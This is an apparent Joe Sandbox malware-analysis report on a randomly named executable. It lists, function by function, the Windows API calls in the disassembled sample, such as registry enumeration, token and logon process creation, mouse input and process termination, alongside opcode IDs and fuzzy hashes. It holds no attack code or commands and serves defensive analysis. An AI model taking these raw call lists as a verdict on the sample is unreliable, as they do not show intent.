                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: 3cb07ecc29178cd2f8f3bd1ad42d6f8f82911215355eb5a64cab0ceedc41ca4b
                                                                        • Instruction ID: a9f96c0388cd419f8c0ea1e8e06f2945df308bd4b00b6001e3e06b722686ade3
                                                                        • Opcode Fuzzy Hash: 3cb07ecc29178cd2f8f3bd1ad42d6f8f82911215355eb5a64cab0ceedc41ca4b
                                                                        • Instruction Fuzzy Hash: 6611B6B121421EBFEF119FA4CC85EEBBF6DEF08798F014114B604A2050C6729C61DBA4
                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 008B9AE6
                                                                          • Part of subcall function 008B3187: EncodePointer.KERNEL32(00000000), ref: 008B318A
                                                                          • Part of subcall function 008B3187: __initp_misc_winsig.LIBCMT ref: 008B31A5
                                                                          • Part of subcall function 008B3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008B9EA0
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008B9EB4
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008B9EC7
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008B9EDA
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008B9EED
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008B9F00
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008B9F13
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008B9F26
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008B9F39
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008B9F4C
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008B9F5F
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008B9F72
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008B9F85
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008B9F98
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008B9FAB
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008B9FBE
                                                                        • __mtinitlocks.LIBCMT ref: 008B9AEB
                                                                        • __mtterm.LIBCMT ref: 008B9AF4
                                                                          • Part of subcall function 008B9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008B9AF9,008B7CD0,0094A0B8,00000014), ref: 008B9C56
                                                                          • Part of subcall function 008B9B5C: _free.LIBCMT ref: 008B9C5D
                                                                          • Part of subcall function 008B9B5C: DeleteCriticalSection.KERNEL32(0094EC00,?,?,008B9AF9,008B7CD0,0094A0B8,00000014), ref: 008B9C7F
                                                                        • __calloc_crt.LIBCMT ref: 008B9B19
                                                                        • __initptd.LIBCMT ref: 008B9B3B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 008B9B42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 3567560977-0
                                                                        • Opcode ID: fda201f629febd76bcea7a71430987855f6a816df83fe393efd7ec4bad624385
                                                                        • Instruction ID: 4cc4aaac12b1bc8a0f236155b6492b50f70275d8d540af899ce8d441220d49e2
                                                                        • Opcode Fuzzy Hash: fda201f629febd76bcea7a71430987855f6a816df83fe393efd7ec4bad624385
                                                                        • Instruction Fuzzy Hash: A3F0903261D7216AE634B77DBC13ACA3694FF02734F244A29F6E4C63D2EF20944146A2
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008B3F85), ref: 008B4085
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 008B408C
                                                                        • EncodePointer.KERNEL32(00000000), ref: 008B4097
                                                                        • DecodePointer.KERNEL32(008B3F85), ref: 008B40B2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 3489934621-2819208100
                                                                        • Opcode ID: 5a8c8bd603de3dd49c12bf583e30637da9b7b915c3211ba74b0ca37c3d23b482
                                                                        • Instruction ID: a9001f04afdaf0bcebd99102a7198b532b96ceebcb695b43b42b4ad000d458d5
                                                                        • Opcode Fuzzy Hash: 5a8c8bd603de3dd49c12bf583e30637da9b7b915c3211ba74b0ca37c3d23b482
                                                                        • Instruction Fuzzy Hash: E4E092706ADB04ABEA50AF72EC19B853BA5B714787F508424F511E51A0CBB64605FB14
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$__itow
                                                                        • String ID:
                                                                        • API String ID: 1986091926-0
                                                                        • Opcode ID: 67ed098add8c432d71dfa6de7e51b4397340f8e3224c09c66cfc86f949daf137
                                                                        • Instruction ID: f06979d9a6e280e4cb7bbcfcba3a791517e61a59321f45185d25d94d8658cb50
                                                                        • Opcode Fuzzy Hash: 67ed098add8c432d71dfa6de7e51b4397340f8e3224c09c66cfc86f949daf137
                                                                        • Instruction Fuzzy Hash: 92615F3050065E9BCF01EF68CC82AFE37A5FF55308F084529F959EB292EA35E915CB52
                                                                        APIs
                                                                        • DispCallFunc.OLEAUT32(?,?,?,?,?,?,?,?), ref: 008EE337
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE349
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 008EE3B5
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE440
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE459
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE4DF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$CallCopyDispFunc
                                                                        • String ID:
                                                                        • API String ID: 2514896190-0
                                                                        • Opcode ID: 485319b807fa8bbc0160d8eb8c3c2093ef29e3709bf054afcdef541f2bd07c79
                                                                        • Instruction ID: 4e064293bd02e89d91483de40a72baced111f2fa6379909b19321ea82846602c
                                                                        • Opcode Fuzzy Hash: 485319b807fa8bbc0160d8eb8c3c2093ef29e3709bf054afcdef541f2bd07c79
                                                                        • Instruction Fuzzy Hash: D051CD31604755AFD7209F19C884A6FB7E4FF8A314F10892EF985DB2A0D731E884CB15
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 00910E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009102BD
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009102FD
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00910320
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00910349
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0091038C
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00910399
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                        • String ID:
                                                                        • API String ID: 4046560759-0
                                                                        • Opcode ID: 09a57f657e0d4add2810840f1f99423ffce7a5a6d9588ac1b5ef2502eb3c0046
                                                                        • Instruction ID: 06a79d32e9c92ef5262f23ac1936e3e021fdcf5c5efd519ad720b04175733270
                                                                        • Opcode Fuzzy Hash: 09a57f657e0d4add2810840f1f99423ffce7a5a6d9588ac1b5ef2502eb3c0046
                                                                        • Instruction Fuzzy Hash: 28517E312082049FCB05EF68C845EAFBBE9FF89314F04491DF555872A1DB72D985CB52
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 008EEF06
                                                                        • VariantClear.OLEAUT32(00000013), ref: 008EEF78
                                                                        • VariantClear.OLEAUT32(00000000), ref: 008EEFD3
                                                                        • _memmove.LIBCMT ref: 008EEFFD
                                                                        • VariantClear.OLEAUT32(?), ref: 008EF04A
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008EF078
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                        • String ID:
                                                                        • API String ID: 1101466143-0
                                                                        • Opcode ID: 8d7765c7b57a18a79090036e81d4b0e791f8613e4a5b93856a7b22ba63569d8d
                                                                        • Instruction ID: f2de65a6c647eeaa3ef614586a32ea6ae866350918de5f8aae48a59089c11019
                                                                        • Opcode Fuzzy Hash: 8d7765c7b57a18a79090036e81d4b0e791f8613e4a5b93856a7b22ba63569d8d
                                                                        • Instruction Fuzzy Hash: B95179B5A00209EFCB10CF58C884AAAB7F8FF4D314B158569EA49DB351E330E911CFA0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2258
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F22A3
                                                                        • IsMenu.USER32(00000000), ref: 008F22C3
                                                                        • CreatePopupMenu.USER32 ref: 008F22F7
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 008F2355
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008F2386
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: a10e7fc4d4617198837230a9ca569b160c15fa7f7dd62eb65ffd45b05b6bcb0c
                                                                        • Instruction ID: df1bcbfa27dcdf35cf8ba555ee170780946c58e21d39dee711be34855276d0e4
                                                                        • Opcode Fuzzy Hash: a10e7fc4d4617198837230a9ca569b160c15fa7f7dd62eb65ffd45b05b6bcb0c
                                                                        • Instruction Fuzzy Hash: 585169B060420DDBDF21CFB8D888BBDBBE5FF45318F148269EA55EA2A0D3749944CB51
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • BeginPaint.USER32(?,?,?), ref: 0089179A
                                                                        • GetWindowRect.USER32(?,?), ref: 008917FE
                                                                        • ScreenToClient.USER32(?,?), ref: 0089181B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0089182C
                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00891876
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008CB87B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: 06381b2b58436ec71a140f7fde8f6152bb598c2dc11509a0406b9e11023e473c
                                                                        • Instruction ID: a911833f0e94d54533f24bfb06c173b2d48c8cdcf9be039ceec2faa9514285c9
                                                                        • Opcode Fuzzy Hash: 06381b2b58436ec71a140f7fde8f6152bb598c2dc11509a0406b9e11023e473c
                                                                        • Instruction Fuzzy Hash: 1E419130218705AFDF10EF25C898FA67BE8FB59364F184628F564C62A2C7309845EB51
                                                                        APIs
                                                                        • ShowWindow.USER32(009557B0,00000000,014C4A20,?,?,009557B0,?,0091B5A8,?,?), ref: 0091B712
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0091B736
                                                                        • ShowWindow.USER32(009557B0,00000000,014C4A20,?,?,009557B0,?,0091B5A8,?,?), ref: 0091B796
                                                                        • ShowWindow.USER32(00000000,00000004,?,0091B5A8,?,?), ref: 0091B7A8
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0091B7CC
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0091B7EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 44128a06ba975a87ec4c0260a7e4b81dee21e992c35dbe0ca3d5416e98a88a72
                                                                        • Instruction ID: 6f8a2284f2b1489188c7ae125e7d3433698ce18e4e5091c3a2833da85f5727dc
                                                                        • Opcode Fuzzy Hash: 44128a06ba975a87ec4c0260a7e4b81dee21e992c35dbe0ca3d5416e98a88a72
                                                                        • Instruction Fuzzy Hash: 04416D34704248AFDB22CF24C499BD47BE6FB45310F1881B9E9498FAF2C731A896CB50
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00904E41,?,?,00000000,00000001), ref: 009070AC
                                                                          • Part of subcall function 009039A0: GetWindowRect.USER32(?,?), ref: 009039B3
                                                                        • GetDesktopWindow.USER32 ref: 009070D6
                                                                        • GetWindowRect.USER32(00000000), ref: 009070DD
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0090710F
                                                                          • Part of subcall function 008F5244: Sleep.KERNEL32(000000FA,00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F52BC
                                                                        • GetCursorPos.USER32(?), ref: 0090713B
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00907199
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: 249ddf1acfe3dbc82caca85583c74f7efe0760ce2c60e2a1685652e2449bb501
                                                                        • Instruction ID: 6199566bef9ceb1d437347524216de44f6b2bd1e07b6a3f0de0192e575395583
                                                                        • Opcode Fuzzy Hash: 249ddf1acfe3dbc82caca85583c74f7efe0760ce2c60e2a1685652e2449bb501
                                                                        • Instruction Fuzzy Hash: 5331D272609309AFD720DF54C849B9BB7AAFF88314F000919F595971D1CA34EA19CB92
                                                                        APIs
                                                                          • Part of subcall function 008E80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E80C0
                                                                          • Part of subcall function 008E80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E80CA
                                                                          • Part of subcall function 008E80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E80D9
                                                                          • Part of subcall function 008E80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008E80E0
                                                                          • Part of subcall function 008E80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E80F6
                                                                        • GetLengthSid.ADVAPI32(?,00000000,008E842F), ref: 008E88CA
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008E88D6
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 008E88DD
                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 008E88F6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,008E842F), ref: 008E890A
                                                                        • HeapFree.KERNEL32(00000000), ref: 008E8911
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                        • String ID:
                                                                        • API String ID: 3008561057-0
                                                                        • Opcode ID: fac6f47d08674ed5bfe0fc9895bffd247f6263641ef51dd12fe813be6bcda1ea
                                                                        • Instruction ID: a5bd9494809f681dd9deced1d92fbb6966fa534ff9b116e7dc5e30c56f0832e6
                                                                        • Opcode Fuzzy Hash: fac6f47d08674ed5bfe0fc9895bffd247f6263641ef51dd12fe813be6bcda1ea
                                                                        • Instruction Fuzzy Hash: CE11B131A15209FFDB109FA5DC19BFE7BA8FB46315F108128E849D7211CB329D00DB61
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,008C8734,?,?), ref: 008C9974
                                                                        • __calloc_crt.LIBCMT ref: 008C9983
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,014B9378,000000FF,00000000,00000000,00000000,00000000,?,?,008C8734,?,?,?,008C3FCC,0092E500), ref: 008C999F
                                                                        • ___crtsetenv.LIBCMT ref: 008C99AE
                                                                        • _free.LIBCMT ref: 008C99C1
                                                                        • _free.LIBCMT ref: 008C99DC
                                                                          • Part of subcall function 008B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008B9A24), ref: 008B2D69
                                                                          • Part of subcall function 008B2D55: GetLastError.KERNEL32(00000000,?,008B9A24), ref: 008B2D7B
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapLast___crtsetenv__calloc_crt
                                                                        • String ID:
                                                                        • API String ID: 3554878821-0
                                                                        • Opcode ID: a1f27271c4ca733e6cb9022bacaf9400485de2a01e1ada2ff70dc5d37ac2d811
                                                                        • Instruction ID: d752a31a5a4f1c6164873565f626bc488fb0257cce72a252265a25fca14da6cb
                                                                        • Opcode Fuzzy Hash: a1f27271c4ca733e6cb9022bacaf9400485de2a01e1ada2ff70dc5d37ac2d811
                                                                        • Instruction Fuzzy Hash: C111A731509545BADB215A6A9C09F6F7B7CFBC2B30B30425EF454E21D0DE70D901D621
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008E85E2
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008E85E9
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008E85F8
                                                                        • CloseHandle.KERNEL32(00000004), ref: 008E8603
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008E8632
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 008E8646
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: 6e5c661f2b44dfbe3dba0a7e2438982afd1356b3462a76f008ff81b986a1ae01
                                                                        • Instruction ID: 8b60bf933d4114eab9fcd6eb4e80b13f82f03b688338636350c7c533c134f58c
                                                                        • Opcode Fuzzy Hash: 6e5c661f2b44dfbe3dba0a7e2438982afd1356b3462a76f008ff81b986a1ae01
                                                                        • Instruction Fuzzy Hash: 27114A7260424DEBDF02CFA5DD49BDE7BA9FB49344F048064FE08A21A0C7718E61EB60
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 008EB7B5
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 008EB7C6
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008EB7CD
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 008EB7D5
                                                                        • MulDiv.KERNEL32(000009EC,008EB465,00000000), ref: 008EB7EC
                                                                        • MulDiv.KERNEL32(000009EC,016A52EC,?), ref: 008EB7FE
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        • Opcode ID: 9a52b51b1b9a6e542dda533530cbb13e9add010157bfb9de85ea471c010f4e15
                                                                        • Instruction ID: 9852a551a5c60523ca61ac0a81ae46567e0427640ab1bc557a84d6f8b33a4a48
                                                                        • Opcode Fuzzy Hash: 9a52b51b1b9a6e542dda533530cbb13e9add010157bfb9de85ea471c010f4e15
                                                                        • Instruction Fuzzy Hash: 51018475E04209BBEF109BA69C45A9EBFB8EB48351F008075FA04E7291D6309C00CF91
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008B0193
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 008B019B
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008B01A6
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008B01B1
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 008B01B9
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B01C1
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: e2900b5b6570ee6bdb5e41dcd41c7dfa9f3d8cabb0cc3fff9a3ddc013602bc6e
                                                                        • Instruction ID: 54a0bdb776da47e033bcdb94cd609fe35e83b8599025ce41871cbd7b882292d2
                                                                        • Opcode Fuzzy Hash: e2900b5b6570ee6bdb5e41dcd41c7dfa9f3d8cabb0cc3fff9a3ddc013602bc6e
                                                                        • Instruction Fuzzy Hash: 35016CB0901B5D7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008F53F9
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008F540F
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 008F541E
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008F542D
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008F5437
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008F543E
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: d8325e5c310dfb348e6b9cc3e195249e3815f97b915f6241f3ef5ad4fdc66b40
                                                                        • Instruction ID: 386959b8fc65f8b2fc9703dd64bf32959c279456fa90180cb5a21a06a86aea76
                                                                        • Opcode Fuzzy Hash: d8325e5c310dfb348e6b9cc3e195249e3815f97b915f6241f3ef5ad4fdc66b40
                                                                        • Instruction Fuzzy Hash: 27F06D3225855CBBE3215BA2DC0DEEB7A7CEBC6B51F004169FA04D1061D6A01A01D6B5
